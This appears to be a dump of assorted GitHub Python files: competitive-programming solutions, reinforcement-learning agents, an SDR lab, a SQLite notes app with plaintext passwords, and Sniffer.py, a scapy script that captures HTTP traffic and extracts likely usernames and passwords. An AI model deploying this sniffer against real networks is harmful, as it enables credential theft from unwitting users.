maze[x][y] == '+':\n continue\n if x == 0 or x == m - 1 or y == 0 or y == n - 1:\n return ans\n q.append((x, y))\n seen.add((x, y))\n\n return -1\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/1926. Nearest Exit from Entrance in Maze/1926.py","file_name":"1926.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"73451755571","text":"# all accpeted\n\nimport sys\n\ndef format_time_stamp(time_stamp:str):\n l = sorted([int(i) for i in time_stamp.split(':')], reverse = 1)\n return sum([l[i] * 60**i for i in range(3)])\n\nN = int(input())\nminimum = sys.maxsize\nmaximum = -sys.maxsize\nmin_name = None\nmax_name = None\n\nfor _ in range(N):\n name, enter, leave = input().split()\n enter, leave = [format_time_stamp(i) for i in [enter, leave]]\n if enter < minimum:\n minimum = enter\n min_name = name\n if leave > maximum:\n maximum = leave\n max_name = name\n\nprint(min_name, max_name)","repo_name":"git-thinker/PTA","sub_path":"PAT (Advanced Level) Practice/1006 Sign In and Sign Out.py","file_name":"1006 Sign In and Sign Out.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1648763266","text":"import sys\nimport gym\nimport pylab\nimport random\nimport numpy as np\nimport time\nfrom collections import deque\n\nimport torch as torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\nclass Net(nn.Module):\n def __init__(self, input_size, output_size):\n super(Net, self).__init__()\n self.fc1 = nn.Linear(input_size, 128)\n self.fc2 = nn.Linear(128, 128)\n self.fc2_1 = nn.Linear(128, 128)\n self.fc3 = nn.Linear(128, output_size)\n self.initweight()\n\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = F.relu(self.fc2_1(x))\n x = self.fc3(x)\n return x\n \n def initweight(self):\n 
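# Xavier-uniform init for all linear layers; xavier_uniform_ works in place, so the trailing .to(device) result is discarded\n        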
torch.nn.init.xavier_uniform_(self.fc1.weight).to(device)\n torch.nn.init.xavier_uniform_(self.fc2.weight).to(device)\n torch.nn.init.xavier_uniform_(self.fc2_1.weight).to(device)\n torch.nn.init.xavier_uniform_(self.fc3.weight).to(device)\n\nEPISODES = 500\n# 카트폴 예제에서의 DQN 에이전트\n\n\nclass DQNAgent:\n def __init__(self, state_size, action_size):\n self.render = True\n self.load_model = False\n\n # 상태와 행동의 크기 정의\n self.state_size = state_size\n self.action_size = action_size\n\n # DQN 하이퍼파라미터\n self.discount_factor = 0.99\n self.learning_rate = 0.001\n self.epsilon = 1.0\n self.epsilon_decay = 0.999\n self.epsilon_min = 0.001\n self.batch_size = 500\n self.train_start = 2000\n\n # 리플레이 메모리, 최대 크기 2000\n self.memory = deque(maxlen=3000)\n\n # 모델과 타깃 모델 생성\n self.model = Net(self.state_size, self.action_size).to(device)\n self.target_model = Net(self.state_size, self.action_size).to(device)\n\n self.criterion = nn.MSELoss().to(device)\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.learning_rate)\n\n # 타깃 모델 초기화\n self.update_target_model()\n\n #if self.load_model:\n # self.model.load_weights(\"./save_model/cartpole_dqn_trained.h5\")\n\n # 타깃 모델을 모델의 가중치로 업데이트\n def update_target_model(self):\n self.target_model.load_state_dict(self.model.state_dict())\n #weight.data 는 뭐지...\n\n # 입실론 탐욕 정책으로 행동 선택\n def get_action(self, state):\n if np.random.rand() <= self.epsilon:\n # 무작위 행동 반환\n return torch.tensor([[random.randrange(self.action_size)]], device=device, dtype=torch.long)\n else:\n with torch.no_grad():\n # 모델로부터 행동 산출\n state = torch.FloatTensor(state).to(device)\n return self.model(state)[0].argmax()\n\n # 샘플 을 리플레이 메모리에 저장\n def append_sample(self, state, action, reward, next_state, done):\n self.memory.append((state, action, reward, next_state, done))\n\n # 리플레이 메모리에서 무작위로 추출한 배치로 모델 학습\n def train_model(self):\n if self.epsilon > self.epsilon_min:\n self.epsilon *= self.epsilon_decay\n\n # 메모리에서 배치 크기만큼 무작위로 샘플 추출\n mini_batch = random.sample(self.memory, self.batch_size)\n\n states = np.zeros((self.batch_size, self.state_size))\n next_states = np.zeros((self.batch_size, self.state_size))\n actions, rewards, dones = [], [], []\n\n for i in range(self.batch_size):\n states[i] = mini_batch[i][0]\n actions.append(mini_batch[i][1])\n rewards.append(mini_batch[i][2])\n next_states[i] = mini_batch[i][3]\n dones.append(mini_batch[i][4])\n\n # 현재 상태에 대한 모델의 큐함수\n # 다음 상태에 대한 타깃 모델의 큐함수\n states = torch.FloatTensor(states).to(device)\n next_states = torch.FloatTensor(next_states).to(device)\n actions = torch.LongTensor(actions).unsqueeze(1).to(device)\n rewards = torch.FloatTensor(rewards).to(device)\n dones = torch.FloatTensor(dones).to(device)\n\n output = self.model(states).gather(1, actions)\n target = self.target_model(next_states).max(1)[0].detach()\n target = rewards + self.discount_factor * dones * target\n\n self.optimizer.zero_grad()\n loss = self.criterion(output.squeeze(), target)\n loss.backward()\n self.optimizer.step()\n\n\nif __name__ == \"__main__\":\n # CartPole-v1 환경, 최대 타임스텝 수가 500\n env = gym.make('CartPole-v1')\n state_size = env.observation_space.shape[0]\n action_size = env.action_space.n\n\n # DQN 에이전트 생성\n agent = DQNAgent(state_size, action_size)\n\n scores, episodes, steps = [], [], []\n\n for e in range(EPISODES):\n done = False\n score = 0\n step_size = 0\n # env 초기화\n state = env.reset()\n state = np.reshape(state, [1, state_size])\n\n while not done:\n # 현재 상태로 행동을 선택\n action = agent.get_action(state).item()\n # 선택한 행동으로 환경에서 한 타임스텝 진행\n 
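# advance the environment one timestep with the chosen action\n            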
next_state, reward, done, info = env.step(action)\n            next_state = np.reshape(next_state, [1, state_size])\n            #reward = (-abs(state[0][2])*100 + 5)\n            # give a -100 reward if the episode ends early\n            reward = reward if not done or step_size >= 499 else -100\n\n            # store the sample in the replay memory\n            agent.append_sample(state, action, reward, next_state, not done)\n            # train on every timestep\n            if len(agent.memory) >= agent.train_start:\n                if agent.render:\n                    env.render()\n                agent.train_model()\n\n            score += reward\n            state = next_state\n            step_size += 1\n\n            if done:\n                # at the end of each episode, update the target model with the model's weights\n                agent.update_target_model()\n\n                #score = score if score == 500 else score + 100\n                # print the training result for each episode\n                scores.append(score)\n                episodes.append(e)\n                steps.append(step_size)\n                pylab.plot(episodes, steps, 'b')\n                pylab.savefig(\"./save_graph/cartpole_dqn.png\")\n                print(\"episode:\", e, \"  score:\", score, \"  memory length:\",\n                      len(agent.memory), \"  epsilon:\", agent.epsilon, \" step:\", step_size)\n\n                # stop training if the mean score of the previous 10 episodes exceeds 490\n                #if np.mean(scores[-min(10, len(scores)):]) > 490:\n                #    agent.model.save_weights(\"./save_model/cartpole_dqn.h5\")\n                #    sys.exit()\n","repo_name":"Skyrich2000/TorchStudy","sub_path":"dpn/agent_torch.py","file_name":"agent_torch.py","file_ext":"py","file_size_in_byte":7023,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20727351542","text":"import io\nfrom operator import mod\nimport sys\n\n# for recursion\n# sys.setrecursionlimit(10**9)\n\n\n_INPUT = \"\"\"\\\n27\n\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n# ---------------------------------\n\nB = int(input())\na = 1\nwhile a**a <= B:\n    if a**a == B:\n        print(a)\n        exit()\n    a += 1\nprint(-1)\n","repo_name":"makima333/Atcoder-ganbaru","sub_path":"contest/abc327/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34216622853","text":"from scipy.stats import spearmanr, pearsonr, kendalltau\nimport sys\nimport pandas as pd\n\nresults_file = sys.argv[1]\nresults = pd.read_csv(results_file, sep=\"\\t\")\nsimilarity = results['R score'].tolist()\nscore = results[\"score\"].tolist()\n\nscorr = spearmanr(similarity, score)\n# print(\"File:\", results_file)\nprint(\"Spearman Rank Correlation:{0:6.3f}\".format(scorr.correlation))\nif (scorr.pvalue >= 0.001):\n\tprint(\"P-value:{0:6.3f}\".format(scorr.pvalue))\nelse:\n\tprint(\"P-value:{0:10.3e}\".format(scorr.pvalue))\npcorr = pearsonr(similarity, score)\nprint(\"Pearson Correlation Coefficient:{0:6.3f}\".format(pcorr[0]))\nif (pcorr[1] >= 0.001):\n\tprint(\"P-value:{0:6.3f}\".format(pcorr[1]))\nelse:\n\tprint(\"P-value:{0:10.3e}\".format(pcorr[1]))\nkentau = kendalltau(similarity, score)\nprint(\"Kendall Rank Correlation :{0:6.3f}\".format(kentau[0]))\nif (kentau[1] >= 0.001):\n\tprint(\"P-value:{0:6.3f}\".format(kentau[1]))\nelse:\n\tprint(\"P-value:{0:10.3e}\".format(kentau[1]))\n","repo_name":"EshwarSR/AutomaticEvaluationMetrics","sub_path":"1_BERTScore/corr.py","file_name":"corr.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74600396531","text":"import numpy as np\nimport tensorflow as tf\n\nfrom DeepAgent.interfaces.ibaseNetwork import BaseNetwork\n\n\nclass NoisyNet(BaseNetwork):\n\n    def __init__(self, dense_layers=None, **kwargs):\n\n        super(NoisyNet, self).__init__(dense_layers=dense_layers, **kwargs)\n        if dense_layers is None:\n            self.dense_layers = 
None\n self.build()\n\n def build(self):\n\n model_input = tf.keras.layers.Input(shape=(self.input_shape[0], self.input_shape[1], self.frame_stack))\n scale = tf.keras.layers.Lambda(lambda p: p / 255.0)(model_input)\n\n conv_layers = []\n\n for layer_id in tf.range(len(self.conv_layers['filters'])):\n if layer_id == 0:\n conv_input = scale\n else:\n conv_input = conv_layers[-1]\n\n conv_layers.append(tf.keras.layers.Conv2D(filters=self.conv_layers['filters'][layer_id],\n kernel_size=self.conv_layers['kernel_sizes'][layer_id],\n strides=self.conv_layers['strides'][layer_id],\n padding=self.conv_layers['paddings'][layer_id],\n activation=self.conv_layers['activations'][layer_id],\n kernel_initializer=self.conv_layers['initializers'][layer_id],\n name=self.conv_layers['names'][layer_id],\n use_bias=False\n )(conv_input))\n\n if self.dense_layers is None:\n value_stream, advantage_stream = tf.split(conv_layers[-1], 2, 3)\n value_stream = tf.keras.layers.Flatten()(value_stream)\n advantage_stream = tf.keras.layers.Flatten()(advantage_stream)\n else:\n dense_layers = []\n\n for layer_id in tf.range(len(self.dense_layers['units'])):\n if layer_id == 0:\n dense_input = tf.keras.layers.Flatten()(conv_layers[-1])\n else:\n dense_input = dense_layers[-1]\n\n dense_layers.append(NoisyDense(\n units=self.dense_layers['units'][layer_id],\n name=self.dense_layers['names'][layer_id]\n )(dense_input))\n dense_layers.append(tf.keras.activations.get(\n self.dense_layers['activations'][layer_id]\n )(dense_layers[-1]))\n\n value_stream = dense_layers[-1]\n advantage_stream = dense_layers[-1]\n\n value_layer_2 = NoisyDense(units=1, name='value_layer')(value_stream)\n\n advantage_layer_2 = NoisyDense(units=self.n_actions, name='advantage_layer')(advantage_stream)\n\n out_layer = value_layer_2 + tf.math.subtract(advantage_layer_2,\n tf.reduce_mean(advantage_layer_2, axis=1,\n keepdims=True))\n\n model = tf.keras.models.Model(inputs=[model_input], outputs=[out_layer])\n self.model = model\n super().build()\n\n\nclass NoisyDense(tf.keras.layers.Layer):\n\n def __init__(self, units, std_init=0.5, **kwargs):\n super(NoisyDense, self).__init__(**kwargs)\n\n self.units = units\n\n self.std_init = std_init\n\n def build(self, input_shape):\n assert len(input_shape) >= 2\n input_dim = input_shape[-1]\n\n self.reset_noise(input_dim)\n\n mu_range = 1 / np.sqrt(input_dim)\n mu_initializer = tf.random_uniform_initializer(-mu_range, mu_range)\n sigma_initializer = tf.constant_initializer(self.std_init / np.sqrt(self.units))\n\n self.weight_mu = tf.Variable(initial_value=mu_initializer(shape=(input_dim, self.units), dtype='float32'),\n trainable=True)\n\n self.weight_sigma = tf.Variable(initial_value=sigma_initializer(shape=(input_dim, self.units), dtype='float32'),\n trainable=True)\n\n self.bias_mu = tf.Variable(initial_value=mu_initializer(shape=(self.units,), dtype='float32'),\n trainable=True)\n\n self.bias_sigma = tf.Variable(initial_value=sigma_initializer(shape=(self.units,), dtype='float32'),\n trainable=True)\n self.built = True\n\n def call(self, inputs):\n self.kernel = self.weight_mu + self.weight_sigma * self.weights_eps\n self.bias = self.bias_mu + self.bias_sigma * self.bias_eps\n return tf.matmul(inputs, self.kernel) + self.bias\n\n @staticmethod\n def _scale_noise(dim):\n noise = tf.random.normal([dim])\n return tf.sign(noise) * tf.sqrt(tf.abs(noise))\n\n def reset_noise(self, input_shape):\n eps_in = self._scale_noise(input_shape)\n eps_out = self._scale_noise(self.units)\n self.weights_eps = 
tf.multiply(tf.expand_dims(eps_in, 1), eps_out)\n self.bias_eps = eps_out\n\n def compute_output_shape(self, input_shape):\n assert input_shape and len(input_shape) >= 2\n assert input_shape[-1]\n output_shape = list(input_shape)\n output_shape[-1] = self.units\n return tuple(output_shape)","repo_name":"LANNDS18/DeepAgent_Atari","sub_path":"DeepAgent/networks/noisyNet.py","file_name":"noisyNet.py","file_ext":"py","file_size_in_byte":5367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2240251225","text":"# includes core parts of numpy, matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\n# include scipy's signal processing functions\nimport scipy.signal as signal\n\n# practice reading in complex values stored in a file\n# Read in data that has been stored as raw I/Q interleaved 32-bit float samples\n\ndat = np.fromfile(\"iqsamples.float32\", dtype=\"float32\")\n# Look at the data. Is it complex?\ndat\n\n# Turn the interleaved I and Q samples into complex values\n# the syntax \"dat[0::2]\" means \"every 2nd value in \n# array dat starting from the 0th until the end\"\ndat = dat[0::2] + 1j*dat[1::2]\n\n# Note: a quicker way to turn the interleaved I and Q samples into complex values\n# (courtesy of http://stackoverflow.com/a/5658446/) would be:\n# dat = dat.astype(np.float32).view(np.complex64)\n\n# Now look at the data again. Verify that it is complex:\ndat \n\n# Plot the spectogram of this data\nplt.specgram(dat, NFFT=1024, Fs=1000000)\nplt.title(\"PSD of 'signal' loaded from file\")\nplt.xlabel(\"Time\")\nplt.ylabel(\"Frequency\")\nplt.show() # if you've done this right, you should see a fun surprise here!\n\n# Let's try a PSD plot of the same data\nplt.psd(dat, NFFT=1024, Fs=1000000)\nplt.title(\"PSD of 'signal' loaded from file\")\nplt.show() \n\n\n# And let's look at it on the complex plan\n# Note that showing *every* data point would be time- and processing-intensive\n# so we'll just show a few\nplt.scatter(np.real(dat[0:100000]), np.imag(dat[0:100000]))\nplt.title(\"Constellation of the 'signal' loaded from file\")\nplt.show()\n\nFs = 1000000 # define sampling rate\n\n# Let's try a frequency translation. 
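# ---------------------------------------------------------------
# Aside: a quick self-check (not part of the original lab) that mixing a
# signal with a complex exponential really shifts its spectrum: generate
# a pure tone, mix it down, and locate the FFT peak.
#
#     import numpy as np
#     Fs = 1000000
#     n = np.arange(4096)
#     tone = np.exp(2j * np.pi * 200000 / Fs * n)          # tone at +200 kHz
#     mixed = tone * np.exp(-2j * np.pi * 50000 / Fs * n)  # shift down 50 kHz
#     freqs = np.fft.fftfreq(n.size, d=1 / Fs)
#     print(freqs[np.argmax(np.abs(np.fft.fft(mixed)))])   # ~150 kHz
# ---------------------------------------------------------------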
For a complex signal, \n# frequency translation is achieved with multiplication by a complex exponential\n\n# To mix the data down, generate a complex exponential \n# with phase -f_shift/Fs\nfc = np.exp(-1.0j*2.0*np.pi* 50000/Fs*np.arange(len(dat)))\n# Try plotting this complex exponential with a scatter plot of the complex plan - \n# what do you expect it to look like?\ny = dat * fc\n\n# How has our PSD changed?\n\nplt.psd(dat, NFFT=1024, Fs=1000000, color=\"blue\") # original\nplt.psd(y, NFFT=1024, Fs=1000000, color=\"green\") # translated\nplt.title(\"PSD of 'signal' loaded from file\")\nplt.show() \n\n\n# What happens when you filter your data with a lowpass filter?\nf_bw = 150000\nFs = 1000000\nn_taps = 64 \nlpf = signal.remez(n_taps, [0, f_bw, f_bw+(Fs/2-f_bw)/4, Fs/2], [1,0], Hz=Fs)\n\n# Plot your filter's frequency response:\nw, h = signal.freqz(lpf)\nplt.plot(w, 20 * np.log10(abs(h)))\nplt.xscale('log')\nplt.title('Filter frequency response')\nplt.xlabel('Frequency')\nplt.ylabel('Amplitude')\nplt.margins(0, 0.1)\nplt.grid(which='both', axis='both')\nplt.show()\n\ny = signal.lfilter(lpf, 1.0, dat)\n\n# How has our PSD changed?\n\nplt.psd(dat, NFFT=1024, Fs=1000000, color=\"blue\") # original\nplt.psd(y, NFFT=1024, Fs=1000000, color=\"green\") # filtered\nplt.title(\"PSD of 'signal' loaded from file\")\nplt.show() \n\n# Let's try decimating following a lowpass filter\n\n# Figure out our best decimation rate\ndec_rate = int(Fs / f_bw)\nz = signal.decimate(y, dec_rate)\nFs_z = Fs/dec_rate\n\n# New PSD - now with new Fs\nplt.psd(z, NFFT=1024, Fs=Fs_z, color=\"blue\")\nplt.show()\n\n# Given a signal x (in a numpy array)\ny = x[1:] * np.conj(x[:-1])\nz = np.angle(y)\n\n# The de-emphasis filter\n# Given a signal 'x5' (in a numpy array) with sampling rate Fs_y\nd = Fs_y * 75e-6 # Calculate the # of samples to hit the -3dB point\nx = np.exp(-1/d) # Calculate the decay between each sample\nb = [1-x] # Create the filter coefficients\na = [1,-x]\nx6 = signal.lfilter(b,a,x5)\n\n# Given a signal x (in a numpy array)\nx *= 10000 / np.max(np.abs(x)) # scale so it's audible\nx.astype(\"int16\").tofile(\"wbfm-mono.raw\") # write to file\n\n","repo_name":"wezelball/airspy_ra","sub_path":"airspy_plotiqdata/Lab1/Lab1.py","file_name":"Lab1.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42823484988","text":"import scapy.all as scapy\nfrom scapy.layers.http import HTTPRequest # import HTTP packet\nfrom scapy.layers.inet import IP #import IP altough not necessary.\nfrom colorama import init, Fore\n# initialize colorama\ninit()\n# define colors\nGREEN = Fore.GREEN\nRED = Fore.RED\nBLUE = Fore.BLUE\nRESET = Fore.RESET\n\nclass Sniffer():\n\n def __init__(self):\n self.sniff_packets()\n\n def sniff_packets(self): #main function for sniffing.\n scapy.sniff(prn=self.process_sniffed_packet, store=False) #using scapy.sniff() to sniff the packets, creates a packet by name of packet, prn is callback function to process sniffed packets.\n\n def get_url(self, packet): # to get url from packet\n if packet.haslayer(HTTPRequest):\n url = packet[HTTPRequest].Host + packet[HTTPRequest].Path # combining the Host or domain name with the path.\n return url\n\n def get_ip(self, packet): # to get source IP from packet\n if packet.haslayer(HTTPRequest):\n ip = packet[IP].src\n return ip\n \n def get_method(self, packet): # to get request method from packet.\n if packet.haslayer(HTTPRequest):\n method = 
packet[HTTPRequest].Method.decode()\n            return method\n\n    def get_login_info(self, packet): # to get possibly login related info.\n        keywords = [\"username\", \"uname\", \"pass\",\"password\",\"login\",\"user\"] #keywords frequently used with login forms.\n        if packet.haslayer(HTTPRequest):\n            if packet.haslayer(scapy.Raw): # load is usually carried in Raw portion of packets.\n                load = str(packet[scapy.Raw].load) \n                for keyword in keywords:\n                    if keyword in load:\n                        return load\n\n    def process_sniffed_packet(self, packet): #callback function mentioned above.\n        url = self.get_url(packet)\n        login_info = self.get_login_info(packet)\n        ip = self.get_ip(packet)\n        method = self.get_method(packet)\n\n        if url and ip and method:\n            print(f\"[+] {RED}{ip}{RESET} Requested {RED}{url}{RESET} with {RED}{method}{RESET}\")\n        if url and ip and method == \"POST\":\n            print(f\"[+] {RED}{ip}{RESET} Requested {RED}{url}{RESET} with {BLUE}{method}{RESET}\")\n        if login_info:\n            print(f\"\\n[+] Possible Username/Password {RED}{login_info}{RESET}\\n\")\n        \n\nif __name__ == \"__main__\":\n    try:\n        S = Sniffer()\n    except KeyboardInterrupt:\n        print(\"[-] Keyboard Interrupted..... EXITING!!\")\n","repo_name":"Prashant-rex/Rudimentry-Linux-Tools","sub_path":"Sniffer/Sniffer.py","file_name":"Sniffer.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"20896170480","text":"\"\"\"changing values\"\"\"\ntalaba = {\n    \"ism\": \"Nurbek\",\n    \"kurs\": \"3-kurs\",\n    \"baho\": 5,\n    \"yoshi\": 14}\ntalaba[\"millati\"]=\"qozoq\" # add a nationality\nprint(talaba)\n\ntalaba[\"ism\"]=\"Nurbek\" # change the name\n\nif talaba[\"yoshi\"]>15: # if older than 15, ...\n    print(\"older than 20\")\nelse:\n    print(\"the student is younger than 20\")\n","repo_name":"Bahrom21/python_lessons","sub_path":"8.07.2021/3-masala 8.07.py","file_name":"3-masala 8.07.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6192520278","text":"# LINK: https://leetcode.com/problems/reverse-linked-list/\n\n\nclass ListNode:\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\n\n\ndef reverseList(head):\n    # walk the list, re-pointing each node at its predecessor\n    prev = None\n    current = head\n    while current:\n        nxt = current.next\n        current.next = prev\n        prev = current\n        current = nxt\n    return prev\n\n# start with the head element and point each node back at the previous one,\n# repeat until the last element in the linked list: the old tail is the new head\n\n\n\nhead = None\nfor val in [5,4,3,2,1]:\n    head = ListNode(val, head)\nhead = reverseList(head)\nwhile head:\n    print(head.val)\n    head = head.next\n","repo_name":"19hhowton/LeetCode","sub_path":"Chapter3_DynamicDataStructures/206. Reverse Linked List.py","file_name":"206. 
Reverse Linked List.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38756820993","text":"\"\"\"\nProeycto pythom MYSQL\nUn asistente que te permite loguearte/registro\nPermite crear notas, una vez registrado\n\"\"\"\n#importar módulo sqlite\nimport sqlite3\n\n# creación base de datos\nconexion = sqlite3.connect(\"./20-proyecto-python/usuarios.db\")\n\n# Crear tablas de usuario y notas\ntabla_usuario = conexion.cursor()\ntabla_notas = conexion.cursor()\n\ntabla_usuario.execute(\"\"\"CREATE TABLE IF NOT EXISTS usuario (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n nombre varchar(8),\n contraseña varchar(10)\n)\"\"\")\n\ntabla_notas.execute(\"\"\"CREATE TABLE IF NOT EXISTS notas (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n titulo varchar(10),\n contenido varchar(120),\n nombre varchar(8)\n)\"\"\")\n\naccion_usuario = int(input(\"Que acción quieres realizar \\n1.Logueo \\n2.Registro \\n3.Salir \\n\"))\nwhile accion_usuario >=1:\n if accion_usuario == 1:\n # Sistema de logueo del proyecto\n print(\"Logueo\")\n confirmar_usuario = input(\"Introduce tu nombre de usuario: \")\n confirmar_contraseña = input(\"Introduce tu contraseña: \")\n buscar_usuario_registrado = conexion.cursor()\n buscar_usuario_registrado.execute(\"SELECT * from usuario WHERE nombre = ? and contraseña = ?\", (confirmar_usuario, confirmar_contraseña))\n comprobar_usuario = buscar_usuario_registrado.fetchone()\n while comprobar_usuario == None:\n print(\"Usuario no existente\")\n confirmar_usuario = input(\"Introduce de nuevo el usuario: \")\n confirmar_contraseña = input(\"Introduce la contraseña de nuevo: \")\n buscar_usuario_registrado = conexion.cursor()\n buscar_usuario_registrado.execute(\"SELECT * from usuario WHERE nombre = ? and contraseña = ?\", (confirmar_usuario, confirmar_contraseña))\n comprobar_usuario = buscar_usuario_registrado.fetchone()\n \n # Eleccion de la accion a realizar con las notas\n accion_usuario_registro = int(input(\"Que acción quieres realizar \\n1.Crear notas \\n2. Eliminar notas \\n3.Modificar \\n4.Salir \\n\"))\n while accion_usuario_registro >=1:\n # Crear una nota asociada a un usuario específico\n if accion_usuario_registro == 1:\n print(\"Crear\")\n titulo_nota = input(\"Introduce un título para la nota: \")\n contenido_nota = input(\"Contenido de la nota: \")\n crear_nota = conexion.cursor()\n crear_nota.execute(\"INSERT INTO notas VALUES (null,?,?,?)\", (titulo_nota,contenido_nota,confirmar_usuario))\n conexion.commit()\n accion_usuario_registro = int(input(\"Que acción quieres realizar \\n1.Crear notas \\n2. 
Delete notes \\n3.Modify \\n4.Exit \\n\"))\n        while accion_usuario_registro >=1:\n            # create a note tied to a specific user\n            if accion_usuario_registro == 1:\n                print(\"Create\")\n                titulo_nota = input(\"Enter a title for the note: \")\n                contenido_nota = input(\"Note content: \")\n                crear_nota = conexion.cursor()\n                crear_nota.execute(\"INSERT INTO notas VALUES (null,?,?,?)\", (titulo_nota,contenido_nota,confirmar_usuario))\n                conexion.commit()\n                accion_usuario_registro = int(input(\"Which action do you want to perform \\n1.Create notes \\n2. Delete notes \\n3.Modify \\n4.Exit \\n\"))\n\n\n            elif accion_usuario_registro == 2:\n                print(\"Delete\")\n            elif accion_usuario_registro == 3:\n                print(\"Modify\")\n            else:\n                print(\"invalid option\")\n\n    # registration action\n    elif accion_usuario == 2:\n        print(\"Register\")\n        nombre_usuario = input(\"Enter your username: \")\n        contraseña = input(\"Enter your password: \")\n        cursor_insert_users = conexion.cursor()\n        cursor_insert_users.execute(\"INSERT INTO usuario VALUES (null,?,?)\", (nombre_usuario, contraseña))\n        conexion.commit()\n    elif accion_usuario == 3:\n        print(\"exit\")\n        break\n    else :\n        print(\"Invalid option\")\n        accion_usuario = int(input(\"enter a valid option \\n\"))\n\nconexion.close()\n","repo_name":"IagoFernandezBlanco/Basic_Pyhton_Note_App","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29177459218","text":"import pandas as pd\r\n\r\npliki = ['C:/Users/ca125/Desktop/Obciążenia_przesunięcia_marzec.xlsx',\r\n         'C:/Users/ca125/Desktop/Obciążenia_przesunięcia_październik.xlsx']\r\nsciezka_docelowa = 'C:/Users/ca125/Desktop/'\r\ncol_P = 'Zapotrzebowanie KSE [MW]'\r\n\r\nfor plik in pliki:\r\n    nazwa_pliku = plik.split('/')[-1].split('.')[0] + '_szczyty.xlsx'\r\n    writer = pd.ExcelWriter(sciezka_docelowa + nazwa_pliku)\r\n    df_wszystkie = pd.read_excel(plik, sheet_name=None, index_col=0)\r\n    for nazwa, df in df_wszystkie.items():\r\n        tabela = pd.DataFrame()\r\n        tabela['Pmax'] = df.groupby(by=df.index.date)[col_P].max()\r\n        tabela['Godzina Pmax'] = df.groupby(by=df.index.date)[col_P].idxmax()\r\n        mask1 = df.index.hour <= 11\r\n        tabela['Pmax 0-11'] = df.loc[mask1].groupby(by=df.loc[mask1].index.date)[col_P].max()\r\n        tabela['Godzina Pmax 0-11'] = df.loc[mask1].groupby(by=df.loc[mask1].index.date)[col_P].idxmax()\r\n        mask2 = df.index.hour >= 12\r\n        tabela['Pmax 12-23'] = df.loc[mask2].groupby(by=df.loc[mask2].index.date)[col_P].max()\r\n        tabela['Godzina Pmax 12-23'] = df.loc[mask2].groupby(by=df.loc[mask2].index.date)[col_P].idxmax()\r\n        tabela.to_excel(writer, nazwa)\r\n    writer.save()\r\n\r\n\r\n","repo_name":"dmrowiec-pl/utils","sub_path":"Szczyty_dobowe_godziny.py","file_name":"Szczyty_dobowe_godziny.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31189229697","text":"# @before-stub-for-debug-begin\nfrom python3problem14 import *\nfrom typing import *\n# @before-stub-for-debug-end\n\n#\n# @lc app=leetcode.cn id=14 lang=python3\n#\n# [14] Longest Common Prefix\n#\n\n# @lc code=start\nclass Solution:\n    def longestCommonPrefix(self, strs) -> str:\n        i = -1\n        n = len(strs)\n        if n == 0:\n            return \"\"\n        if n == 1:\n            return strs[0]\n        flag = True\n        try:\n            while flag:\n                i += 1\n                for j in range(1, n):\n                    if strs[j][i] != strs[j-1][i]:\n                        flag = False\n                        break\n            # print(i)\n            return strs[0][:i]\n        except IndexError:\n            return strs[0][:i]\n# s = Solution().longestCommonPrefix([\"dog\",\"racecar\",\"car\"])\n# print(s)\n\"\"\"\nAccepted — finally got it through. My version counts as vertical scanning; there is also horizontal scanning, which can be done divide-and-conquer — worth trying later.\n123/123 cases passed (48 ms)\nYour runtime beats 26.57 % of python3 submissions\nYour memory usage beats 63.42 % of python3 submissions (14.9 MB)\n\"\"\"\n\n# @lc 
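# ---------------------------------------------------------------
# Aside: the note above mentions trying "horizontal scanning" later; a
# minimal sketch (not part of the solution above) shrinks a candidate
# prefix against each string in turn:
#
#     def longestCommonPrefixH(strs):
#         if not strs:
#             return ""
#         prefix = strs[0]
#         for s in strs[1:]:
#             while not s.startswith(prefix):
#                 prefix = prefix[:-1]
#                 if not prefix:
#                     return ""
#         return prefix
# ---------------------------------------------------------------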
